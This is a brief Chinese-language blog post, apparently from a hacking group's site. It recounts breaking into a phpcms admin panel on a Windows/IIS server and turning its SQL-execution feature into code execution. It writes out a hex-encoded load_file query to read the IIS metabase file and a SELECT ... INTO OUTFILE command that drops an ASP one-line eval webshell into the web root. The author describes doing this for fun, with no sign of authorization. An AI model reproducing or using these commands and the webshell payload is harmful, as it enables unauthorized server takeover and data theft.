文章作者：co14[J.L.S.T]
信息来源：安全叶子技术小组[J.Leaves Security Team](http://www.00day.cn)

phpcms后台拿webshell

刚写了个利用工具,想试试拿个webshell玩,费了不少力气才进了个后台
环境:windows+IIS,root
不熟悉这程序,小弟不才,一时还不知道怎么弄
周围看了下,可以执行sql,先试试能否load_file,因为注点里load出来得文件才看到那么一小段
先读c:\\windows\system32\\inetsrv\\metabase.xml试试
select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C)
结果,,,,




没回显...晕乎,
继续转转,发现了个环境变量




得到物理路径




回到sql执行,导出webshell:
既然是IIS,直接用asp的一句话算了
select/**/'<%eval request("sb")%>'/**/into/**/outfile/**/'E:\\xxxx\\1x.asp'/*




访问




..过程比较顺利,,RP大爆发的说
各位不要BS我,,,,